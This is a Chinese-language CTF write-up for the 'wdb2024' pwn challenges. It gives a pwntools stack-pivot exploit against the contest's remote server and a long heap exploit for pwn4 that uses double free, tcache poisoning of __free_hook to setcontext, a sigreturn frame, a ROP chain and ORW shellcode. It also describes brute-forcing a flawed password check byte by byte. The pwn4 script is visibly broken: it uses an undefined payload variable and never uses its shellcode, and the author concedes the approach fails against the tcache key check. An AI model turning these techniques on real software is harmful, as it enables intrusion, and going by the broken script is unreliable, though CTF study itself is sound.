wdb2024

pwn1

image-20241029091057398

可恶的rust逆向,有种做re题的感觉,看不懂一点

pwn2

image-20241029093746667

32位,只开了nx

只能溢出8个字节,栈迁移,有后门函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
elf = ELF('./short')
context(arch = elf.arch,os = elf.os,log_level = 'debug')
p = remote("0192d60e43d27e5e8c956281c5971e23.r1bf.dg01.ciihw.cn",46332)
#p = process('./short')
#p = gdb.debug('./short','b main')
gift = elf.sym['gift']
bin_sh = 0x0804a038
leave = 0x08048555
p.sendlineafter('username:','admin')
p.sendlineafter('password','admin123')

p.recvuntil('0x')
buf = p.recv(8)
buf = int(buf,16)
print(hex(buf))

offset = 0x50 - 0x4*4
payload = b'aaaa'+ p32(gift)+ p32(0)+p32(bin_sh)
p.send(payload + cyclic(offset)+p32(buf)+p32(leave))
p.interactive()

pwn3

pwn3没看懂,而且忘记把题目描述搞下来了,估计是个webpwn的题目吧

pwn4

image-20241029112612117

libc2.27菜单题,应该是堆

image-20241029112700048

有沙箱

在add函数中,限制了堆的数量为7个,size不作限制,正常的存储堆大小和堆指针

edit函数中,首先要确保chunksize不为空,才能进行edit操作

show函数中,需要根据chunksize进行输出

delete函数中,根据index进行free,存在uaf漏洞,free之后会将chunksize置空,也就是说执行delete之后的chunk无法再进行show或者edit了。但是delete之后的chunk仍然可以进行delete,存在double free漏洞。

1
2
3
4
5
6
7
8
9
10
11
由于本题存在沙箱,可以尝试free_hook改set_context打orw
解题思路:
根据一般堆题的思路,还是得泄露libc,此处可以通过unsortedbin来进行leak_libc
然后由于set_context需要一个构造好的chunk,还需要获得heap_base
然后使用double free的tcachebin修改free_hook为set_context,再进行delete操作触发set_context,执行布置好的rop链,即可成功orw
解题步骤:
1、add一个unsortedbin chunk0,然后free掉它,由于执行delete操作之后的chunk不能执行show操作,此处可以通过add操作再将chunk分配回来,由于一次unsortedbin会返回两个相同的main_arena地址,所以我们取第二个就好了。
2、add一个tcachebin chunk1,然后直接free掉它两次,再add一个idx不同但是size相同的tcachbin chunk2,然后再次free掉它,然后再free掉chunk1,由于先进后出的机制,所以再次add时chunk1会被分配出来,show chunk1,就会显示chunk1的地址。edit chunk1使chunk1指向free_hook,将free_hook分配出来,修改指向set_context即可。
3、布置rop链,执行orw

(ps:出现了非常重大的纰漏,就是这道题的libc对tcachebin的key进行了检查,但是这道题的chunk在delete之后是无法edit的,也就无法修改key来绕过tcachebin对double free的检测,所以不知道怎么做了,但是在没有对key进行检测的版本还是可以用的,但是在有key的版本可以通过key来泄露堆地址)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
from pwn import *
elf = ELF('./pwn')
context(arch = elf.arch,os = elf.os,log_level = 'debug',terminal = ['tmux','splitw','-h'])
p = process('./pwn')
#p = gdb.debug('../pwn','b main')
libc = ELF('./libc-2.27.so')

def debug():
        gdb.attach(p)
        pause()
def menu(index):
        p.sendlineafter("option >>",str(index))
def add(index,size,content):
        menu(1)
        p.sendlineafter("index >>",str(index))
        p.sendlineafter("size >>",str(size))
        p.sendafter("content >>",content)
def edit(index,content):
        menu(2)
        p.sendlineafter("index >>",str(index))
        p.sendafter("content >>",content)
def delete(index):
        menu(3)
        p.sendlineafter("index >>",str(index))
def show(index):
        menu(4)
        p.sendlineafter("index >>",str(index))
def exit():
        menu(5)

add(0,0x410,'aaaa')
add(1,0x150,'bbbb')
add(2,0x150,'cccc')
add(6,0x20,'barrier')

# leak_libc unsortedbin -> chunk0
delete(0)
add(0,0x410,b'\x00')
show(0)
recv = p.recv(16)
print(recv)
unsortedbin = int.from_bytes(recv[8:],byteorder='little')
libc_base = unsortedbin - 0x70 - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
setcontext = libc_base + libc.sym['setcontext']
log.success(hex(unsortedbin))
log.success(hex(libc_base))
log.success(hex(free_hook))
log.success(hex(setcontext))
# double free
# tcachebin -> chunk1
delete(1) 
# tcachebin -> chunk2 -> chunk1 
delete(2)
# tcachebin -> chunk1 -> chunk2 -> chunk1
delete(1)
# tcachebin -> chunk2 -> chunk1 -> free_hook
add(1,0x150,p64(free_hook))
# tcachebin -> chunk1 -> free_hook
add(2,0x150,'cccc')
# tcachebin -> free_hook
add(3,0x150,'eeee')
# chunk4 -> set_context
add(4,0x150,p64(setcontext))

syscall = libc_base + next(libc.search(asm("syscall\nret")))
print(hex(syscall))
frame = SigreturnFrame()
frame.rax = 0 # 调用read 0x98
frame.rdi = 0 # 参数1 0为标准输入 0x70
frame.rsi = free_hook&0xfffffffffffff000 # 参数2 写入 free_hook所在的页起始地址 0x78
frame.rdx = 0x2000 # 参数3 写入的长度 0x90
frame.rsp = free_hook&0xfffffffffffff000 # 执行完read之后跳转到该地址 0xa8
frame.rip = syscall # 使用syscall调用read函数 0xb0
str_frame = bytes(frame)
print(str_frame)

add(5,0x450,'ffff')
edit(5,str_frame)
delete(5)

layout = [
    next(libc_base+libc.search(asm("pop rdi\nret"))), 
    free_hook & 0xfffffffffffff000,
    next(libc_base+libc.search(asm("pop rsi\nret"))),
    0x2000,
    next(libc_base+libc.search(asm("pop rdx\nret"))),
    7,
    next(libc_base+libc.search(asm("pop rax\nret"))),
    10,
    syscall,
    next(libc_base+libc.search(asm("jmp rsp"))),
]
# orw-shellcode
shellcode = asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall

cmp eax, 0
js failed

mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall

mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall

jmp exit

failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall

exit:
xor edi, edi
mov eax, 231
syscall
''')

payload = flat(layout) + payload
p.sendline(payload)
#delete(7)

p.interactive()
                  
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
frame = SigreturnFrame()
frame.rax = 0 # 调用read [rdi+0x90]
frame.rdi = 0 # 参数1 0为标准输入 [rdi+0x68]
frame.rsi = free_hook&0xfffffffffffff000 # 参数2 写入 free_hook所在的页起始地址 [rdi+0x70]
frame.rdx = 0x2000 # 参数3 写入的长度 [rdi+0x88]
frame.rsp = free_hook&0xfffffffffffff000 # 执行完read之后跳转到该地址 [rdi+0xa0]
frame.rip = syscall # 使用syscall调用read函数 [rdi+0xa8]
str_frame = bytes(frame)

分析一下进入setcontext+53之后的程序变化
rsp=free_hook&0xfffffffffffff000
rbx,rbp,r12,r13,r14,r15=0
rcx=syscall;ret
rsp = rcx(push rcx)
rsi=free_hook&0xfffffffffffff000
rdx=0x2000
rcx,r8,r9=0
rdi=0
rax=0(xor eax)
ret syscall(ret)

syscall(rax=0,rdi=0,rsi=free_hook&0xfffffffffffff000,rdx=0x2000)(就是一个read函数)

之后再执行mportect函数和orw的shellcode

image-20241111224521494

pwn4(赛后版)

保护全开,有沙箱

image-20241110152331842

pwn4在比赛的时候和比赛后似乎不是一个附件,在赛后版添加了一个账号和密码的输入,但是由于cmp函数中存在漏洞,可以通过逐字节爆破的方式来爆破出正确的账号密码。

image-20241110151258807

a1是输入的内容,a2是正确的账号或者密码,实际上应该比较的长度是a2的长度,但是此处使用了a1的长度来比较,存在逻辑漏洞。也就是说如果在输入的密码中只要部分正确就可以通过检验,然后根据后续的长度检验就可以爆破出正确的密码。

账号密码输入正确之后就可以进入菜单部分,也就是堆的部分。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
//RC4加密的反编译代码,其中的KSA密钥调度算法

unsigned __int64 __fastcall sub_F98(__int64 a1, __int64 a2, unsigned __int64 a3)
{
  char v4; // [rsp+27h] [rbp-119h]
  int i; // [rsp+28h] [rbp-118h]
  int j; // [rsp+28h] [rbp-118h]
  int v7; // [rsp+2Ch] [rbp-114h]
  char v8[264]; // [rsp+30h] [rbp-110h] BYREF
  unsigned __int64 v9; // [rsp+138h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  v7 = 0;
  memset(v8, 0, 0x100uLL);
  for ( i = 0; i <= 255; ++i )
  {
    *(_BYTE *)(i + a1) = i;
    v8[i] = *(_BYTE *)(i % a3 + a2);
  }
  for ( j = 0; j <= 255; ++j )
  {
    v7 = (v8[j] + v7 + *(unsigned __int8 *)(j + a1)) % 256;
    v4 = *(_BYTE *)(j + a1);
    *(_BYTE *)(j + a1) = *(_BYTE *)(v7 + a1);
    *(_BYTE *)(a1 + v7) = v4;
  }
  return __readfsqword(0x28u) ^ v9;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
// rc4加密算法中的PRGA部分(伪随机生成算法)

unsigned __int64 __fastcall enc_rc4_1152(__int64 a1, __int64 a2, unsigned __int64 a3)
{
  unsigned __int64 result; // rax
  char v4; // [rsp+23h] [rbp-15h]
  int v5; // [rsp+24h] [rbp-14h]
  int v6; // [rsp+28h] [rbp-10h]
  unsigned __int64 i; // [rsp+30h] [rbp-8h]

  v5 = 0;
  v6 = 0;
  for ( i = 0LL; ; ++i )
  {
    result = i;
    if ( i >= a3 )
      break;
    v5 = (v5 + 1) % 256;
    v6 = (v6 + *(unsigned __int8 *)(v5 + a1)) % 256;
    v4 = *(_BYTE *)(v5 + a1);
    *(_BYTE *)(v5 + a1) = *(_BYTE *)(v6 + a1);
    *(_BYTE *)(a1 + v6) = v4;
    *(_BYTE *)(a2 + i) ^= *(_BYTE *)((unsigned __int8)(*(_BYTE *)(v5 + a1) + *(_BYTE *)(v6 + a1)) + a1);
  }
  return result;
}

在save函数中将输入的数据进行rc4加密并存储在了堆中

在read函数中将堆块中的数据通过rc4加密之后输出,由于rc4两次之后能够将数据还原,此处其实是将堆块中的数据还原成了未加密的状态输出出来,然后再次进行rc4,将数据再次加密。

在delete函数中将堆块free但是存在uaf漏洞,delete时会使用一次rc4加密

在edit函数中先将原有的数据进行一次rc4加密然后输入新的经过rc4加密的数据,函数不存在漏洞,修改的数据长度是根据read函数中输入的数据来决定的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
已知信息:libc2.27,存在沙箱,存在uaf漏洞
一般情况下是使用set_context + orw,所以试一试吧
解题思路:覆盖free_hook为set_context+53打orw,通过delete函数触发
解题思路->解题步骤
1、如何覆盖free_hook呢,首先要leak_libc
2、实现leak_libc之后,通过修改tcachebin的next就可以修改tcache的指向,从而修改free_hook了
解题步骤
1、先申请9个相同大小的chunk,大小为0x100
2、free掉7个填满tcachebin,再free掉一个填入unsortedbin
3、show tcachebin中的chunk,计算出heap_base
4、show unsortedbin中的chunk,计算出libc_base
5、申请一个跟之前不同大小的chunk,通过uaf实现double free,然后修改tcachebin的指向,修改指向free_hook,然后修改free_hook为set_context+53
6、通过ropper搜索pop rdi;ret pop rsi;ret pop rdx;ret的地址(可以使用系统调用或者函数调用)
7、将构造好的rop写入足够大的堆块中,然后free掉这个chunk,就可以实现rop链的调用。
8、至于数值的解密和加密,可以通过在本地部署一个rc4加密来解决,注意0x0d的截断

系统调用号表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
cat /usr/include/asm/unistd_64.h 
#ifndef _ASM_X86_UNISTD_64_H
#define _ASM_X86_UNISTD_64_H 1

#define __NR_read 0
#define __NR_write 1
#define __NR_open 2
#define __NR_close 3
#define __NR_stat 4
#define __NR_fstat 5
#define __NR_lstat 6
#define __NR_poll 7
#define __NR_lseek 8
#define __NR_mmap 9
#define __NR_mprotect 10
#define __NR_munmap 11
#define __NR_brk 12
#define __NR_rt_sigaction 13
#define __NR_rt_sigprocmask 14
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
#define __NR_pwrite64 18
#define __NR_readv 19
#define __NR_writev 20
#define __NR_access 21
#define __NR_pipe 22
#define __NR_select 23
#define __NR_sched_yield 24
#define __NR_mremap 25
#define __NR_msync 26
#define __NR_mincore 27
#define __NR_madvise 28
#define __NR_shmget 29
#define __NR_shmat 30
#define __NR_shmctl 31
#define __NR_dup 32
#define __NR_dup2 33
#define __NR_pause 34
#define __NR_nanosleep 35
#define __NR_getitimer 36
#define __NR_alarm 37
#define __NR_setitimer 38
#define __NR_getpid 39
#define __NR_sendfile 40
#define __NR_socket 41
#define __NR_connect 42
#define __NR_accept 43
#define __NR_sendto 44
#define __NR_recvfrom 45
#define __NR_sendmsg 46
#define __NR_recvmsg 47
#define __NR_shutdown 48
#define __NR_bind 49
#define __NR_listen 50
#define __NR_getsockname 51
#define __NR_getpeername 52
#define __NR_socketpair 53
#define __NR_setsockopt 54
#define __NR_getsockopt 55
#define __NR_clone 56
#define __NR_fork 57
#define __NR_vfork 58
#define __NR_execve 59
#define __NR_exit 60
#define __NR_wait4 61
#define __NR_kill 62
#define __NR_uname 63
#define __NR_semget 64
#define __NR_semop 65
#define __NR_semctl 66
#define __NR_shmdt 67
#define __NR_msgget 68
#define __NR_msgsnd 69
#define __NR_msgrcv 70
#define __NR_msgctl 71
#define __NR_fcntl 72
#define __NR_flock 73
#define __NR_fsync 74
#define __NR_fdatasync 75
#define __NR_truncate 76
#define __NR_ftruncate 77
#define __NR_getdents 78
#define __NR_getcwd 79
#define __NR_chdir 80
#define __NR_fchdir 81
#define __NR_rename 82
#define __NR_mkdir 83
#define __NR_rmdir 84
#define __NR_creat 85
#define __NR_link 86
#define __NR_unlink 87
#define __NR_symlink 88
#define __NR_readlink 89
#define __NR_chmod 90
#define __NR_fchmod 91
#define __NR_chown 92
#define __NR_fchown 93
#define __NR_lchown 94
#define __NR_umask 95
#define __NR_gettimeofday 96
#define __NR_getrlimit 97
#define __NR_getrusage 98
#define __NR_sysinfo 99
#define __NR_times 100
#define __NR_ptrace 101
#define __NR_getuid 102
#define __NR_syslog 103
#define __NR_getgid 104
#define __NR_setuid 105
#define __NR_setgid 106
#define __NR_geteuid 107
#define __NR_getegid 108
#define __NR_setpgid 109
#define __NR_getppid 110
#define __NR_getpgrp 111
#define __NR_setsid 112
#define __NR_setreuid 113
#define __NR_setregid 114
#define __NR_getgroups 115
#define __NR_setgroups 116
#define __NR_setresuid 117
#define __NR_getresuid 118
#define __NR_setresgid 119
#define __NR_getresgid 120
#define __NR_getpgid 121
#define __NR_setfsuid 122
#define __NR_setfsgid 123
#define __NR_getsid 124
#define __NR_capget 125
#define __NR_capset 126
#define __NR_rt_sigpending 127
#define __NR_rt_sigtimedwait 128
#define __NR_rt_sigqueueinfo 129
#define __NR_rt_sigsuspend 130
#define __NR_sigaltstack 131
#define __NR_utime 132
#define __NR_mknod 133
#define __NR_uselib 134
#define __NR_personality 135
#define __NR_ustat 136
#define __NR_statfs 137
#define __NR_fstatfs 138
#define __NR_sysfs 139
#define __NR_getpriority 140
#define __NR_setpriority 141
#define __NR_sched_setparam 142
#define __NR_sched_getparam 143
#define __NR_sched_setscheduler 144
#define __NR_sched_getscheduler 145
#define __NR_sched_get_priority_max 146
#define __NR_sched_get_priority_min 147
#define __NR_sched_rr_get_interval 148
#define __NR_mlock 149
#define __NR_munlock 150
#define __NR_mlockall 151
#define __NR_munlockall 152
#define __NR_vhangup 153
#define __NR_modify_ldt 154
#define __NR_pivot_root 155
#define __NR__sysctl 156
#define __NR_prctl 157
#define __NR_arch_prctl 158
#define __NR_adjtimex 159
#define __NR_setrlimit 160
#define __NR_chroot 161
#define __NR_sync 162
#define __NR_acct 163
#define __NR_settimeofday 164
#define __NR_mount 165
#define __NR_umount2 166
#define __NR_swapon 167
#define __NR_swapoff 168
#define __NR_reboot 169
#define __NR_sethostname 170
#define __NR_setdomainname 171
#define __NR_iopl 172
#define __NR_ioperm 173
#define __NR_create_module 174
#define __NR_init_module 175
#define __NR_delete_module 176
#define __NR_get_kernel_syms 177
#define __NR_query_module 178
#define __NR_quotactl 179
#define __NR_nfsservctl 180
#define __NR_getpmsg 181
#define __NR_putpmsg 182
#define __NR_afs_syscall 183
#define __NR_tuxcall 184
#define __NR_security 185
#define __NR_gettid 186
#define __NR_readahead 187
#define __NR_setxattr 188
#define __NR_lsetxattr 189
#define __NR_fsetxattr 190
#define __NR_getxattr 191
#define __NR_lgetxattr 192
#define __NR_fgetxattr 193
#define __NR_listxattr 194
#define __NR_llistxattr 195
#define __NR_flistxattr 196
#define __NR_removexattr 197
#define __NR_lremovexattr 198
#define __NR_fremovexattr 199
#define __NR_tkill 200
#define __NR_time 201
#define __NR_futex 202
#define __NR_sched_setaffinity 203
#define __NR_sched_getaffinity 204
#define __NR_set_thread_area 205
#define __NR_io_setup 206
#define __NR_io_destroy 207
#define __NR_io_getevents 208
#define __NR_io_submit 209
#define __NR_io_cancel 210
#define __NR_get_thread_area 211
#define __NR_lookup_dcookie 212
#define __NR_epoll_create 213
#define __NR_epoll_ctl_old 214
#define __NR_epoll_wait_old 215
#define __NR_remap_file_pages 216
#define __NR_getdents64 217
#define __NR_set_tid_address 218
#define __NR_restart_syscall 219
#define __NR_semtimedop 220
#define __NR_fadvise64 221
#define __NR_timer_create 222
#define __NR_timer_settime 223
#define __NR_timer_gettime 224
#define __NR_timer_getoverrun 225
#define __NR_timer_delete 226
#define __NR_clock_settime 227
#define __NR_clock_gettime 228
#define __NR_clock_getres 229
#define __NR_clock_nanosleep 230
#define __NR_exit_group 231
#define __NR_epoll_wait 232
#define __NR_epoll_ctl 233
#define __NR_tgkill 234
#define __NR_utimes 235
#define __NR_vserver 236
#define __NR_mbind 237
#define __NR_set_mempolicy 238
#define __NR_get_mempolicy 239
#define __NR_mq_open 240
#define __NR_mq_unlink 241
#define __NR_mq_timedsend 242
#define __NR_mq_timedreceive 243
#define __NR_mq_notify 244
#define __NR_mq_getsetattr 245
#define __NR_kexec_load 246
#define __NR_waitid 247
#define __NR_add_key 248
#define __NR_request_key 249
#define __NR_keyctl 250
#define __NR_ioprio_set 251
#define __NR_ioprio_get 252
#define __NR_inotify_init 253
#define __NR_inotify_add_watch 254
#define __NR_inotify_rm_watch 255
#define __NR_migrate_pages 256
#define __NR_openat 257
#define __NR_mkdirat 258
#define __NR_mknodat 259
#define __NR_fchownat 260
#define __NR_futimesat 261
#define __NR_newfstatat 262
#define __NR_unlinkat 263
#define __NR_renameat 264
#define __NR_linkat 265
#define __NR_symlinkat 266
#define __NR_readlinkat 267
#define __NR_fchmodat 268
#define __NR_faccessat 269
#define __NR_pselect6 270
#define __NR_ppoll 271
#define __NR_unshare 272
#define __NR_set_robust_list 273
#define __NR_get_robust_list 274
#define __NR_splice 275
#define __NR_tee 276
#define __NR_sync_file_range 277
#define __NR_vmsplice 278
#define __NR_move_pages 279
#define __NR_utimensat 280
#define __NR_epoll_pwait 281
#define __NR_signalfd 282
#define __NR_timerfd_create 283
#define __NR_eventfd 284
#define __NR_fallocate 285
#define __NR_timerfd_settime 286
#define __NR_timerfd_gettime 287
#define __NR_accept4 288
#define __NR_signalfd4 289
#define __NR_eventfd2 290
#define __NR_epoll_create1 291
#define __NR_dup3 292
#define __NR_pipe2 293
#define __NR_inotify_init1 294
#define __NR_preadv 295
#define __NR_pwritev 296
#define __NR_rt_tgsigqueueinfo 297
#define __NR_perf_event_open 298
#define __NR_recvmmsg 299
#define __NR_fanotify_init 300
#define __NR_fanotify_mark 301
#define __NR_prlimit64 302
#define __NR_name_to_handle_at 303
#define __NR_open_by_handle_at 304
#define __NR_clock_adjtime 305
#define __NR_syncfs 306
#define __NR_sendmmsg 307
#define __NR_setns 308
#define __NR_getcpu 309
#define __NR_process_vm_readv 310
#define __NR_process_vm_writev 311
#define __NR_kcmp 312
#define __NR_finit_module 313
#define __NR_sched_setattr 314
#define __NR_sched_getattr 315
#define __NR_renameat2 316
#define __NR_seccomp 317
#define __NR_getrandom 318
#define __NR_memfd_create 319
#define __NR_kexec_file_load 320
#define __NR_bpf 321
#define __NR_execveat 322
#define __NR_userfaultfd 323
#define __NR_membarrier 324
#define __NR_mlock2 325
#define __NR_copy_file_range 326
#define __NR_preadv2 327
#define __NR_pwritev2 328
#define __NR_pkey_mprotect 329
#define __NR_pkey_alloc 330
#define __NR_pkey_free 331
#define __NR_statx 332

#endif /* _ASM_X86_UNISTD_64_H */

参考链接:

PWN-ORW总结 - X1ng’s Blog

https://xz.aliyun.com/t/16081?time__1311=GuD%3DYKBKAKDK7KDs6AS1DRCD9DRg%3DnjhaoD

https://kagehutatsu.com/?p=1143

https://blog.wingszeng.top/pwn-glibc-setcontext/

【八芒星计划】 ORW-CSDN博客

堆上的orw-CSDN博客